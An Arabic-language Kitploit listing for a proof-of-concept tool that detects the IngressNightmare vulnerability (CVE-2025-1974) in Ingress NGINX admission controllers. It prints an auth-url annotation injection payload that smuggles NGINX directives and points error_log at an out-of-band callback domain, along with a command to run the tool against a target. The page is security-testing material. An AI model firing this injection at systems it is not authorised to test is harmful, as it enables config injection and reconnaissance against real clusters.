Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
ingressnightmare-detection-poc — أداة إثبات المفهوم للكشف عن IngressNightmare (CVE-2025-1974) عبر وسائل نشطة (غير تدخليّة). | Kitploit
أدوات/GitHubGitHub/m-q-t/ingressnightmare-detection-poc
ماسحات الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقأمن السحابةسوء التكوين
GitHubm-q-t/ingressnightmare-detection-poc

ingressnightmare-detection-poc

أداة إثبات المفهوم للكشف عن IngressNightmare (CVE-2025-1974) عبر وسائل نشطة (غير تدخليّة).

عرض المستودع
3منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة الكشف عن IngressNightmare

نظرة عامة

توفر هذه الأداة إمكانية كشف غير تخربي لسلسلة الثغرات IngressNightmare (CVE-2025-1974) التي تؤثر على وحدة التحكم Ingress NGINX. تستخدم الأداة بشكل خاص ناقل حقن التعليق التوضيحي auth-url (CVE-2025-24514) للتحقق من وجود هذه الثغرة الحرجة دون تنفيذ كود عشوائي.

خلفية تقنية

تسمح سلسلة الثغرات IngressNightmare للمهاجمين بحقن توجيهات تكوين NGINX عشوائية من خلال حقول تعليقات توضيحية مختلفة في Ingress. عندما تتم معالجة موارد Ingress الخبيثة هذه بواسطة وحدة التحكم في القبول، يتم تقييم التوجيهات المحقونة أثناء مرحلة التحقق من تكوين NGINX (nginx -t).

يستغل هذا الإثبات المفاهيمي (PoC) على وجه التحديد ثغرة التعليق التوضيحي auth-url عن طريق حقن توجيه error_log مع خادم syslog يشير إلى نطاق يتحكم فيه المهاجم. أثناء التحقق من التكوين، سيقوم NGINX بما يلي:

  1. تحليل التكوين المحقون
  2. حل النطاق المحدد عبر DNS

يوفر نشاط حل DNS هذا إشارة موثوقة إلى أن الهدف معرض للخطر دون الحاجة إلى تنفيذ كود أو تعطيل الخدمة.

الاستخدام

  1. أنشئ مستمع استرجاع DNS باستخدام Burp Collaborator أو interactsh أو أي خدمة مراقبة DNS.

  2. نفّذ أداة الكشف:

    root@kitploit:~
    $ python3 detect.py -t https://target-admission-controller:443 -c w00tw00t.lf4v7uehamhtt4hufhstpla09rfi38rx.oastify.com 
    
  3. إذا كان الهدف معرضًا للخطر، ستلاحظ محاولات حل DNS لنطاق استرجاع DNS الخاص بك:

poc

منهجية الكشف

تقوم الأداة بصياغة كائن AdmissionReview مشكّل خصيصًا يحتوي على مورد Ingress مع حمولة الحقن التالية:

root@kitploit:~
nginx.ingress.kubernetes.io/auth-url: "http://example.com/#;\n resolver 8.8.8.8;\n error_log syslog:server=unique-id.oastify.com:80 debug;\n #"

تقوم هذه الحمولة بما يلي:

  • استخدام حرف التعليق (#) لإنهاء عنوان URL
  • حقن سطر جديد متبوعًا بتوجيه المحلل (resolver)
  • إضافة توجيه error_log مع syslog يشير إلى نطاق استرجاع DNS
  • التعليق على الجزء المتبقي للحفاظ على الصحة النحوية

عند معالجتها بواسطة وحدة تحكم قبول معرضة للخطر، ينتج عن ذلك بحث DNS خارجي يؤكد وجود الثغرة.

القيود

تكتشف هذه الأداة وجود الثغرة فقط ولا تحاول استغلالها لتنفيذ كود عشوائي.

الاعتمادات

https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities

تنزيل الأداة